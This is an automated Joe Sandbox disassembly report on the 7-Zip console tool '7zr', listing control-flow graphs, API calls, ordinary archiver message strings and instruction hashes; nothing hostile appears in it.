                                control_flow_graph 274 a9a42c-a9a433 275 a9a449-a9a4df call a9545d call a62e04 call a81858 call a61e40 274->275 276 a9a435-a9a444 fputs call a61fa0 274->276 286 a9a4ee-a9a4f1 275->286 287 a9a4e1-a9a4e9 call a9c7d7 275->287 276->275 289 a9a50e-a9a520 call a9c73e 286->289 290 a9a4f3-a9a4fa 286->290 287->286 295 a9ac0b-a9ac2a call a92db9 * 2 289->295 296 a9a526-a9a544 call a61e0c 289->296 290->289 291 a9a4fc-a9a509 call a957fb 290->291 291->289 307 a9ac3a-a9ac66 call a9b96d call a61e40 call a83247 295->307 308 a9ac2c-a9ac33 295->308 304 a9a551 296->304 305 a9a546-a9a54f call a9b0fa 296->305 306 a9a553-a9a55c 304->306 305->306 311 a9a55e-a9a560 306->311 312 a9a564-a9a5c1 call a62fec call a9b277 306->312 327 a9ac68-a9ac6a 307->327 328 a9ac6e-a9acb5 call a61e40 call a611c2 call a9be0c call a92db9 307->328 308->307 313 a9ac35 call a9b988 308->313 311->312 325 a9a5cd-a9a652 call a9ad06 call a9bf3e call a73a29 call a62e04 call a84345 312->325 326 a9a5c3-a9a5c7 312->326 313->307 348 a9a654-a9a671 call a8375c call a9b96d 325->348 349 a9a676-a9a6d6 call a82096 325->349 326->325 327->328 348->349 355 a9a6d8-a9a6dd call a9c7d7 349->355 356 a9a6e2-a9a6e5 349->356 355->356 358 a9a72e-a9a73a 356->358 359 a9a6e7-a9a6ee 356->359 360 a9a73c-a9a74a call a61fa0 358->360 361 a9a79e-a9a7aa 358->361 362 a9a6f0-a9a71d call a61fa0 fputs call a61fa0 call a61fb3 call a61fa0 359->362 363 a9a722-a9a725 359->363 378 a9a74c-a9a753 360->378 379 a9a755-a9a799 fputs call a62201 call a61fa0 fputs call a62201 call a61fa0 360->379 365 a9a7d9-a9a7e5 361->365 366 a9a7ac-a9a7b2 361->366 362->363 363->358 367 a9a727 363->367 372 a9a818-a9a81a 365->372 373 a9a7e7-a9a7ed 365->373 366->365 370 a9a7b4-a9a7d4 fputs call a62201 call a61fa0 366->370 367->358 370->365 375 a9a899-a9a8a5 372->375 376 a9a81c-a9a82b 372->376 373->375 380 a9a7f3-a9a813 fputs call a62201 call a61fa0 373->380 381 a9a8e9-a9a8ed 375->381 382 a9a8a7-a9a8ad 375->382 384 a9a82d-a9a84c fputs call a62201 call a61fa0 376->384 385 a9a851-a9a85d 376->385 378->361 378->379 379->361 380->372 391 a9a8ef 381->391 396 a9a8f6-a9a8f8 381->396 382->391 392 a9a8af-a9a8c2 call a61fa0 382->392 384->385 385->375 395 a9a85f-a9a872 call a61fa0 385->395 391->396 392->391 415 a9a8c4-a9a8e4 fputs call a62201 call a61fa0 392->415 395->375 417 a9a874-a9a894 fputs call a62201 call a61fa0 395->417 404 a9aaaf-a9aaeb call a843b3 call a61e40 call a9c104 call a9ad82 396->404 405 a9a8fe-a9a90a 396->405 404->295 454 a9aaf1-a9aaf7 404->454 412 a9a910-a9a91f 405->412 413 a9aa73-a9aa89 call a61fa0 405->413 412->413 419 a9a925-a9a929 412->419 413->404 430 a9aa8b-a9aaaa fputs call a62201 call a61fa0 413->430 415->381 417->375 419->404 425 a9a92f-a9a93d 419->425 426 a9a96a-a9a971 425->426 427 a9a93f-a9a964 fputs call a62201 call a61fa0 425->427 435 a9a98f-a9a9a8 fputs call a62201 426->435 436 a9a973-a9a97a 426->436 427->426 430->404 449 a9a9ad-a9a9bd call a61fa0 435->449 436->435 442 a9a97c-a9a982 436->442 442->435 447 a9a984-a9a98d 442->447 447->435 452 a9aa06-a9aa4b fputs call a62201 call a61fa0 fputs call a62201 447->452 449->452 458 a9a9bf-a9aa01 fputs call a62201 call a61fa0 fputs call a62201 call a61fa0 449->458 467 a9aa50-a9aa5b call a61fa0 452->467 454->295 458->452 467->404 473 a9aa5d-a9aa71 call a61fa0 call a9710e 467->473 473->404
                                APIs
                                • fputs.MSVCRT(Scanning the drive for archives:), ref: 00A9A43E
                                  • Part of subcall function 00A61FA0: fputc.MSVCRT ref: 00A61FA7
                                Strings
                                Memory Dump Source
                                • Source File: 00000009.00000002.1815060827.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                • Associated: 00000009.00000002.1815044082.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 00000009.00000002.1815144599.0000000000B0C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 00000009.00000002.1815172839.0000000000B22000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 00000009.00000002.1815262080.0000000000B2B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_9_2_a60000_7zr.jbxd
                                Similarity
                                • API ID: fputcfputs
                                • String ID: Alternate Streams Size: $Alternate Streams: $Archives with Errors: $Archives with Warnings: $Archives: $Can't open as archive: $Compressed: $ERROR:$Files: $Folders: $OK archives: $Open Errors: $Scanning the drive for archives:$Size: $Warnings: $!"$N
                                • API String ID: 269475090-3104439828
                                • Opcode ID: f0f392ba5fa8c1e1da0e1f6df8bb4ee80c60bcf071878c639aa531728645fdbd
                                • Instruction ID: e1e8c4e21786baff250819ebf047e9f8b88d0f17e613cf1cc026561bf6b1c5c4
                                • Opcode Fuzzy Hash: f0f392ba5fa8c1e1da0e1f6df8bb4ee80c60bcf071878c639aa531728645fdbd
                                • Instruction Fuzzy Hash: 6C227A30A00258DFDF26EBA4C956BEDBBF1AF54300F14409AE45AA72A1DB716E84CF51

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 777 a98012-a98032 call affb10 780 a98038-a9806c fputs call a98341 777->780 781 a98285 777->781 785 a980c8-a980cd 780->785 786 a9806e-a98071 780->786 782 a98287-a98295 781->782 787 a980cf-a980d4 785->787 788 a980d6-a980df 785->788 789 a9808b-a9808d 786->789 790 a98073-a98089 fputs call a61fa0 786->790 791 a980e2-a98110 call a98341 call a98622 787->791 788->791 793 a9808f-a98094 789->793 794 a98096-a9809f 789->794 790->785 805 a9811e-a9812f call a98565 791->805 806 a98112-a98119 call a9831f 791->806 797 a980a2-a980c7 call a62e47 call a985c6 call a61e40 793->797 794->797 797->785 805->782 812 a98135-a9813f 805->812 806->805 813 a9814d-a9815b 812->813 814 a98141-a98148 call a982bb 812->814 813->782 817 a98161-a98164 813->817 814->813 818 a981b6-a981c0 817->818 819 a98166-a98186 817->819 820 a98276-a9827f 818->820 821 a981c6-a981e1 fputs 818->821 824 a98298-a9829d 819->824 825 a9818c-a98196 call a98565 819->825 820->780 820->781 821->820 826 a981e7-a981fb 821->826 827 a982b1-a982b9 SysFreeString 824->827 831 a9819b-a9819d 825->831 829 a981fd-a9821f 826->829 830 a98273 826->830 827->782 834 a9829f-a982a1 829->834 835 a98221-a98245 829->835 830->820 831->824 832 a981a3-a981b4 SysFreeString 831->832 832->818 832->819 836 a982ae 834->836 838 a982a3-a982ab call a6965d 835->838 839 a98247-a98271 call a984a7 call a6965d SysFreeString 835->839 836->827 838->836 839->829 839->830
                                APIs
                                • __EH_prolog.LIBCMT ref: 00A98017
                                • fputs.MSVCRT ref: 00A9804D
                                  • Part of subcall function 00A98341: __EH_prolog.LIBCMT ref: 00A98346
                                  • Part of subcall function 00A98341: fputs.MSVCRT ref: 00A9835B
                                  • Part of subcall function 00A98341: fputs.MSVCRT ref: 00A98364
                                • fputs.MSVCRT ref: 00A9807A
                                  • Part of subcall function 00A61FA0: fputc.MSVCRT ref: 00A61FA7
                                  • Part of subcall function 00A6965D: VariantClear.OLEAUT32(?), ref: 00A6967F
                                • SysFreeString.OLEAUT32(00000000), ref: 00A981AA
                                • fputs.MSVCRT ref: 00A981CD
                                • SysFreeString.OLEAUT32(00000000), ref: 00A98267
                                • SysFreeString.OLEAUT32(00000000), ref: 00A982B1
                                Strings
                                Memory Dump Source
                                • Source File: 00000009.00000002.1815060827.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                • Associated: 00000009.00000002.1815044082.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 00000009.00000002.1815144599.0000000000B0C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 00000009.00000002.1815172839.0000000000B22000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 00000009.00000002.1815262080.0000000000B2B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_9_2_a60000_7zr.jbxd
                                Similarity
                                • API ID: fputs$FreeString$H_prolog$ClearVariantfputc
                                • String ID: --$----$Path$Type$Warning: The archive is open with offset
                                • API String ID: 2889736305-3797937567
                                • Opcode ID: a0a1fe48ea64e18edb15aa6173d3c45b7d86200e0b124798785e8dbeba9105c4
                                • Instruction ID: 1fc17fb8081c6f38f6666651146bde53280e82a4e9a54e7ff96c598c0c778923
                                • Opcode Fuzzy Hash: a0a1fe48ea64e18edb15aa6173d3c45b7d86200e0b124798785e8dbeba9105c4
                                • Instruction Fuzzy Hash: B5916431B00609EFDF14DFA4CA85AEEBBF5FF59310F204129E512AB291DB74A905CB60

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 846 a96766-a96792 call affb10 EnterCriticalSection 849 a967af-a967b7 846->849 850 a96794-a96799 call a9c7d7 846->850 852 a967b9 call a61f91 849->852 853 a967be-a967c3 849->853 854 a9679e-a967ac 850->854 852->853 856 a967c9-a967d5 853->856 857 a96892-a968a8 853->857 854->849 858 a96817-a9682f 856->858 859 a967d7-a967dd 856->859 860 a968ae-a968b4 857->860 861 a96941 857->861 864 a96831-a96842 call a61fa0 858->864 865 a96873-a9687b 858->865 859->858 862 a967df-a967eb 859->862 860->861 863 a968ba-a968c2 860->863 866 a96943-a9695a 861->866 869 a967ed 862->869 870 a967f3-a96801 862->870 868 a96933-a9693f call a9c5cd 863->868 871 a968c4-a968e6 call a61fa0 fputs 863->871 864->865 879 a96844-a9686c fputs call a62201 864->879 867 a96881-a96887 865->867 865->868 867->868 875 a9688d 867->875 868->866 869->870 870->865 877 a96803-a96815 fputs 870->877 887 a968e8-a968f9 fputs 871->887 888 a968fb-a96917 call a74f2a call a61fb3 call a61e40 871->888 880 a9692e call a61f91 875->880 882 a9686e call a61fa0 877->882 879->882 880->868 882->865 889 a9691c-a96928 call a61fa0 887->889 888->889 889->880
                                APIs
                                • __EH_prolog.LIBCMT ref: 00A9676B
                                • EnterCriticalSection.KERNEL32(00B22938), ref: 00A96781
                                • fputs.MSVCRT ref: 00A9680B
                                • LeaveCriticalSection.KERNEL32(00B22938), ref: 00A96944
                                  • Part of subcall function 00A9C7D7: fputs.MSVCRT ref: 00A9C840
                                • fputs.MSVCRT ref: 00A96851
                                  • Part of subcall function 00A62201: fputs.MSVCRT ref: 00A6221E
                                • fputs.MSVCRT ref: 00A968D9
                                • fputs.MSVCRT ref: 00A968F6
                                  • Part of subcall function 00A61FA0: fputc.MSVCRT ref: 00A61FA7
                                Strings
                                Memory Dump Source
                                • Source File: 00000009.00000002.1815060827.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                • Associated: 00000009.00000002.1815044082.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 00000009.00000002.1815144599.0000000000B0C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 00000009.00000002.1815172839.0000000000B22000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 00000009.00000002.1815262080.0000000000B2B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_9_2_a60000_7zr.jbxd
                                Similarity
                                • API ID: fputs$CriticalSection$EnterH_prologLeavefputc
                                • String ID: v$Sub items Errors:
                                • API String ID: 2670240366-2468115448
                                • Opcode ID: 7cf3176608b0585afebb08163bccccb0e719b2ade65197ec37fa31cd3fe063d5
                                • Instruction ID: 2ec4383755bd66278e57a62799fc7e8e29026e8375533a59cc15ecbff50a60da
                                • Opcode Fuzzy Hash: 7cf3176608b0585afebb08163bccccb0e719b2ade65197ec37fa31cd3fe063d5
                                • Instruction Fuzzy Hash: 7B519D32605A00DFCB259FA4D994AEABBF2FF84310F54896EE19B87261DB307C44CB50

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 898 a96359-a96373 call affb10 901 a9639e-a963af call a95a4d 898->901 902 a96375-a96385 call a9c7d7 898->902 908 a965ee-a965f1 901->908 909 a963b5-a963cd 901->909 902->901 907 a96387-a9639b 902->907 907->901 912 a965f3-a965fb 908->912 913 a96624-a9663c 908->913 910 a963cf 909->910 911 a963d2-a963d4 909->911 910->911 916 a963df-a963e7 911->916 917 a963d6-a963d9 911->917 918 a966ea call a9c5cd 912->918 919 a96601-a96607 call a98012 912->919 914 a9663e call a61f91 913->914 915 a96643-a9664b 913->915 914->915 915->918 922 a96651-a9668f fputs call a6211a call a61fa0 call a98685 915->922 923 a963e9-a963f2 call a61fa0 916->923 924 a96411-a96413 916->924 917->916 921 a964b1-a964bc call a96700 917->921 929 a966ef-a966fd 918->929 932 a9660c-a9660e 919->932 942 a964be-a964c1 921->942 943 a964c7-a964cf 921->943 922->929 986 a96691-a96697 922->986 923->924 947 a963f4-a9640c call a6210c call a61fa0 923->947 930 a96442-a96446 924->930 931 a96415-a9641d 924->931 935 a96448-a96450 930->935 936 a96497-a9649f 930->936 939 a9642a-a9643b 931->939 940 a9641f-a96425 call a96134 931->940 932->929 941 a96614-a9661f call a61fa0 932->941 944 a9647f-a96490 935->944 945 a96452-a9647a fputs call a61fa0 call a61fb3 call a61fa0 935->945 936->921 948 a964a1-a964ac call a61fa0 call a61f91 936->948 939->930 940->939 941->918 942->943 951 a965a2-a965a6 942->951 952 a964f9-a964fb 943->952 953 a964d1-a964da call a61fa0 943->953 944->936 945->944 947->924 948->921 966 a965a8-a965b6 951->966 967 a965da-a965e6 951->967 963 a9652a-a9652e 952->963 964 a964fd-a96505 952->964 953->952 983 a964dc-a964f4 call a6210c call a61fa0 953->983 968 a9657f-a96587 963->968 969 a96530-a96538 963->969 977 a96512-a96523 964->977 978 a96507-a9650d call a96134 964->978 970 a965b8-a965ca call a96244 966->970 971 a965d3 966->971 967->909 974 a965ec 967->974 968->951 985 a96589-a96595 call a61fa0 968->985 980 a9653a-a96562 fputs call a61fa0 call a61fb3 call a61fa0 969->980 981 a96567-a96578 969->981 970->971 996 a965cc-a965ce call a61f91 970->996 971->967 974->908 977->963 978->977 980->981 981->968 983->952 985->951 1005 a96597-a9659d call a61f91 985->1005 993 a96699-a9669f 986->993 994 a966df-a966e5 call a61f91 986->994 1000 a966a1-a966b1 fputs 993->1000 1001 a966b3-a966ce call a74f2a call a61fb3 call a61e40 993->1001 994->918 996->971 1006 a966d3-a966da call a61fa0 1000->1006 1001->1006 1005->951 1006->994
                                APIs
                                • __EH_prolog.LIBCMT ref: 00A9635E
                                • fputs.MSVCRT ref: 00A9645F
                                  • Part of subcall function 00A9C7D7: fputs.MSVCRT ref: 00A9C840
                                • fputs.MSVCRT ref: 00A96547
                                • fputs.MSVCRT ref: 00A9665F
                                • fputs.MSVCRT ref: 00A966AE
                                  • Part of subcall function 00A61F91: fflush.MSVCRT ref: 00A61F93
                                  • Part of subcall function 00A61FB3: __EH_prolog.LIBCMT ref: 00A61FB8
                                  • Part of subcall function 00A61E40: free.MSVCRT ref: 00A61E44
                                Strings
                                Memory Dump Source
                                • Source File: 00000009.00000002.1815060827.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                • Associated: 00000009.00000002.1815044082.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 00000009.00000002.1815144599.0000000000B0C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 00000009.00000002.1815172839.0000000000B22000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 00000009.00000002.1815262080.0000000000B2B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_9_2_a60000_7zr.jbxd
                                Similarity
                                • API ID: fputs$H_prolog$fflushfree
                                • String ID: Can't allocate required memory$ERRORS:$WARNINGS:
                                • API String ID: 1750297421-1898165966
                                • Opcode ID: 19c95da60c37792d8bd6b1d7c7bf5f40180d8865368e5098317f055cc17c30cf
                                • Instruction ID: 0932eff016d475f9af72f97cf5019f66789386120b906e75bf9e96569b791df0
                                • Opcode Fuzzy Hash: 19c95da60c37792d8bd6b1d7c7bf5f40180d8865368e5098317f055cc17c30cf
                                • Instruction Fuzzy Hash: F0B128307017059FDF28EF64CAA1BAABBF1FF44304F04892EE55A97692CB74A944CB51

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1565 a66c72-a66c8e call affb10 1568 a66c96-a66c9e 1565->1568 1569 a66c90-a66c94 1565->1569 1571 a66ca6-a66cae 1568->1571 1572 a66ca0-a66ca4 1568->1572 1569->1568 1570 a66cd3-a66cdc call a68664 1569->1570 1577 a66d87-a66d92 call a688c6 1570->1577 1578 a66ce2-a66d02 call a667f0 call a62f88 call a687df 1570->1578 1571->1570 1574 a66cb0-a66cb5 1571->1574 1572->1570 1572->1571 1574->1570 1576 a66cb7-a66cce call a667f0 call a62f88 1574->1576 1590 a6715d-a6715f 1576->1590 1588 a66f4c-a66f62 call a687fa 1577->1588 1589 a66d98-a66d9e 1577->1589 1604 a66d04-a66d09 1578->1604 1605 a66d4a-a66d61 call a67b41 1578->1605 1599 a66f67-a66f74 call a685e2 1588->1599 1600 a66f64-a66f66 1588->1600 1589->1588 1593 a66da4-a66dc7 call a62e47 * 2 1589->1593 1596 a67118-a67126 1590->1596 1611 a66dd4-a66dda 1593->1611 1612 a66dc9-a66dcf 1593->1612 1613 a66f76-a66f7c 1599->1613 1614 a66fd1-a66fd8 1599->1614 1600->1599 1604->1605 1609 a66d0b-a66d38 call a69252 1604->1609 1616 a66d67-a66d6b 1605->1616 1617 a66d63-a66d65 1605->1617 1609->1605 1633 a66d3a-a66d45 1609->1633 1618 a66df1-a66df9 call a63221 1611->1618 1619 a66ddc-a66def call a62407 1611->1619 1612->1611 1613->1614 1622 a66f7e-a66f8a call a66bf5 1613->1622 1620 a66fe4-a66feb 1614->1620 1621 a66fda-a66fde 1614->1621 1625 a66d6d-a66d75 1616->1625 1626 a66d78 1616->1626 1624 a66d7a-a66d82 call a6764c 1617->1624 1638 a66dfe-a66e0b call a687df 1618->1638 1619->1618 1619->1638 1630 a6701d-a67024 call a68782 1620->1630 1631 a66fed-a66ff7 call a66bf5 1620->1631 1621->1620 1629 a670e5-a670ea call a66868 1621->1629 1622->1629 1646 a66f90-a66f93 1622->1646 1650 a67116 1624->1650 1625->1626 1626->1624 1642 a670ef-a670f3 1629->1642 1630->1629 1647 a6702a-a67035 1630->1647 1631->1629 1652 a66ffd-a67000 1631->1652 1633->1590 1657 a66e43-a66e50 call a66c72 1638->1657 1658 a66e0d-a66e10 1638->1658 1648 a670f5-a670f7 1642->1648 1649 a6710c 1642->1649 1646->1629 1653 a66f99-a66fb6 call a667f0 call a62f88 1646->1653 1647->1629 1654 a6703b-a67044 call a68578 1647->1654 1648->1649 1655 a670f9-a67102 1648->1655 1656 a6710e-a67111 call a66848 1649->1656 1650->1596 1652->1629 1659 a67006-a6701b call a667f0 1652->1659 1682 a66fc2-a66fc5 call a6717b 1653->1682 1683 a66fb8-a66fbd 1653->1683 1654->1629 1679 a6704a-a67054 call a6717b 1654->1679 1655->1649 1663 a67104-a67107 call a6717b 1655->1663 1656->1650 1680 a66e56 1657->1680 1681 a66f3a-a66f4b call a61e40 * 2 1657->1681 1666 a66e12-a66e15 1658->1666 1667 a66e1e-a66e36 call a667f0 1658->1667 1676 a66fca-a66fcc 1659->1676 1663->1649 1666->1657 1675 a66e17-a66e1c 1666->1675 1684 a66e58-a66e7e call a62f1c call a62e04 1667->1684 1685 a66e38-a66e41 call a62fec 1667->1685 1675->1657 1675->1667 1676->1656 1695 a67056-a6705f call a62f88 1679->1695 1696 a67064-a67097 call a62e47 call a61089 * 2 call a66868 1679->1696 1680->1684 1681->1588 1682->1676 1683->1682 1704 a66e83-a66e99 call a66bb5 1684->1704 1685->1684 1706 a67155-a67158 call a66848 1695->1706 1727 a670bf-a670cc call a66bf5 1696->1727 1728 a67099-a670af wcscmp 1696->1728 1711 a66ecf-a66ed1 1704->1711 1712 a66e9b-a66e9f 1704->1712 1706->1590 1717 a66f09-a66f35 call a61e40 * 2 call a66848 call a61e40 * 2 1711->1717 1714 a66ec7-a66ec9 SetLastError 1712->1714 1715 a66ea1-a66eae call a622bf 1712->1715 1714->1711 1724 a66ed3-a66ed9 1715->1724 1725 a66eb0-a66ec5 call a61e40 call a62e04 1715->1725 1717->1650 1734 a66eec-a66f07 call a631e5 1724->1734 1735 a66edb-a66ee0 1724->1735 1725->1704 1746 a670ce-a670d1 1727->1746 1747 a67129-a67133 call a667f0 1727->1747 1731 a670b1-a670b6 1728->1731 1732 a670bb 1728->1732 1739 a67147-a67154 call a62f88 call a61e40 1731->1739 1732->1727 1734->1717 1735->1734 1741 a66ee2-a66ee8 1735->1741 1739->1706 1741->1734 1751 a670d3-a670d6 1746->1751 1752 a670d8-a670e4 call a61e40 1746->1752 1759 a67135-a67138 1747->1759 1760 a6713a 1747->1760 1751->1747 1751->1752 1752->1629 1763 a67141-a67144 1759->1763 1760->1763 1763->1739
                                APIs
                                • __EH_prolog.LIBCMT ref: 00A66C77
                                • SetLastError.KERNEL32(00000002,-00000050,0000000F,-00000038,:$DATA,?,00000000,?), ref: 00A66EC9
                                  • Part of subcall function 00A66C72: wcscmp.MSVCRT ref: 00A670A5
                                  • Part of subcall function 00A66BF5: __EH_prolog.LIBCMT ref: 00A66BFA
                                  • Part of subcall function 00A66BF5: GetFileAttributesW.KERNEL32(?,?,?,00000000,?), ref: 00A66C1A
                                  • Part of subcall function 00A66BF5: GetFileAttributesW.KERNEL32(?,00000000,?,?,00000000,?), ref: 00A66C49
                                Strings
                                Memory Dump Source
                                • Source File: 00000009.00000002.1815060827.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                • Associated: 00000009.00000002.1815044082.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 00000009.00000002.1815144599.0000000000B0C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 00000009.00000002.1815172839.0000000000B22000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 00000009.00000002.1815262080.0000000000B2B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_9_2_a60000_7zr.jbxd
                                Similarity
                                • API ID: AttributesFileH_prolog$ErrorLastwcscmp
                                • String ID: :$DATA
                                • API String ID: 3316598575-2587938151
                                • Opcode ID: 09f21cdf90a084faba479488135298a54ee5b312e1371b48412174f5606e51f3
                                • Instruction ID: df667d6d0a3f06afc70f6873fbc6f25903fbcd7db4bfd6fddd4ad7d7e69b35ba
                                • Opcode Fuzzy Hash: 09f21cdf90a084faba479488135298a54ee5b312e1371b48412174f5606e51f3
                                • Instruction Fuzzy Hash: 74E12530900609DECF21EFA4C991BEEBBB1BF15318F10821DE8526B2E1DB75A949CB51
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000009.00000002.1815060827.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                • Associated: 00000009.00000002.1815044082.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 00000009.00000002.1815144599.0000000000B0C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 00000009.00000002.1815172839.0000000000B22000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 00000009.00000002.1815262080.0000000000B2B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_9_2_a60000_7zr.jbxd
                                Similarity
                                • API ID: fputs$H_prolog
                                • String ID: =
                                • API String ID: 2614055831-2525689732
                                • Opcode ID: 6d659d736f09d0c5304ec9c804aaf253130dbe56f2cdba2f350d06e6a7a9a15a
                                • Instruction ID: 82ca9a99453ce24f8cfc6c945ca8ada1ec273f936063ad563cdcbb48cbe3523d
                                • Opcode Fuzzy Hash: 6d659d736f09d0c5304ec9c804aaf253130dbe56f2cdba2f350d06e6a7a9a15a
                                • Instruction Fuzzy Hash: D9215C32A04118EFCF09EB94DA52BEEBBB5EF58310F24006AE401721A1DF766E55CB91
                                APIs
                                • __EH_prolog.LIBCMT ref: 00A98346
                                • fputs.MSVCRT ref: 00A9835B
                                • fputs.MSVCRT ref: 00A98364
                                  • Part of subcall function 00A983BF: __EH_prolog.LIBCMT ref: 00A983C4
                                  • Part of subcall function 00A983BF: fputs.MSVCRT ref: 00A98401
                                  • Part of subcall function 00A983BF: fputs.MSVCRT ref: 00A98437
                                Strings
                                Memory Dump Source
                                • Source File: 00000009.00000002.1815060827.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                • Associated: 00000009.00000002.1815044082.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 00000009.00000002.1815144599.0000000000B0C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 00000009.00000002.1815172839.0000000000B22000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 00000009.00000002.1815262080.0000000000B2B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_9_2_a60000_7zr.jbxd
                                Similarity
                                • API ID: fputs$H_prolog
                                • String ID: =
                                • API String ID: 2614055831-2525689732
                                • Opcode ID: e91631760b63fe87cb0a92894bdd0865e3f6e96598887d7cd98dbd2953e17c33
                                • Instruction ID: c53745b0eb37cd6c83044e5d92db6b50e910ca8214c02f0ca9f46e3c3f4abf35
                                • Opcode Fuzzy Hash: e91631760b63fe87cb0a92894bdd0865e3f6e96598887d7cd98dbd2953e17c33
                                • Instruction Fuzzy Hash: 27016232A00008ABCF15BBA4D952AEEBFB5EF84750F00401AF401962A1CF795A55DB91
                                APIs
                                • __EH_prolog.LIBCMT ref: 00A8209B
                                  • Part of subcall function 00A6757D: GetLastError.KERNEL32(00A6D14C), ref: 00A6757D
                                  • Part of subcall function 00A82C6C: __EH_prolog.LIBCMT ref: 00A82C71
                                  • Part of subcall function 00A61E40: free.MSVCRT ref: 00A61E44
                                Strings
                                Memory Dump Source
                                • Source File: 00000009.00000002.1815060827.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                • Associated: 00000009.00000002.1815044082.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 00000009.00000002.1815144599.0000000000B0C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 00000009.00000002.1815172839.0000000000B22000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 00000009.00000002.1815262080.0000000000B2B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_9_2_a60000_7zr.jbxd
                                Similarity
                                • API ID: H_prolog$ErrorLastfree
                                • String ID: Cannot find archive file$The item is a directory
                                • API String ID: 683690243-1569138187
                                • Opcode ID: 5cd85b97c69025b982680bcd3f5adc6ebfe6d8c0a486049b304c9f9c9a84532b
                                • Instruction ID: 4ae2c08220c158e25b7bf8d35b04f3041f8faa97b30e56ac8b6c16cca07ed622
                                • Opcode Fuzzy Hash: 5cd85b97c69025b982680bcd3f5adc6ebfe6d8c0a486049b304c9f9c9a84532b
                                • Instruction Fuzzy Hash: 4B723674D00258DFCB25EFA8C984BEDBBB5BF59300F24809AE859A7252D7709E81CF51
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000009.00000002.1815060827.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                • Associated: 00000009.00000002.1815044082.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 00000009.00000002.1815144599.0000000000B0C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 00000009.00000002.1815172839.0000000000B22000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 00000009.00000002.1815262080.0000000000B2B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_9_2_a60000_7zr.jbxd
                                Similarity
                                • API ID: CountTickfputs
                                • String ID: .
                                • API String ID: 290905099-4150638102
                                • Opcode ID: ece1d9a8a3410feca01d218dd5912cae55a28a102dc12d317b7a4c0190da2210
                                • Instruction ID: de41c95942fe65fbe4d31d171c314d55668808c6f9a008df19aee34bed4919df
                                • Opcode Fuzzy Hash: ece1d9a8a3410feca01d218dd5912cae55a28a102dc12d317b7a4c0190da2210
                                • Instruction Fuzzy Hash: 90712430700B049FDF21EF68CA91BAAB7F6AF81724F50481DE09797A81DB70B949CB11
                                APIs
                                  • Part of subcall function 00A69C8F: GetModuleHandleA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx), ref: 00A69CB3
                                  • Part of subcall function 00A69C8F: GetProcAddress.KERNEL32(00000000), ref: 00A69CBA
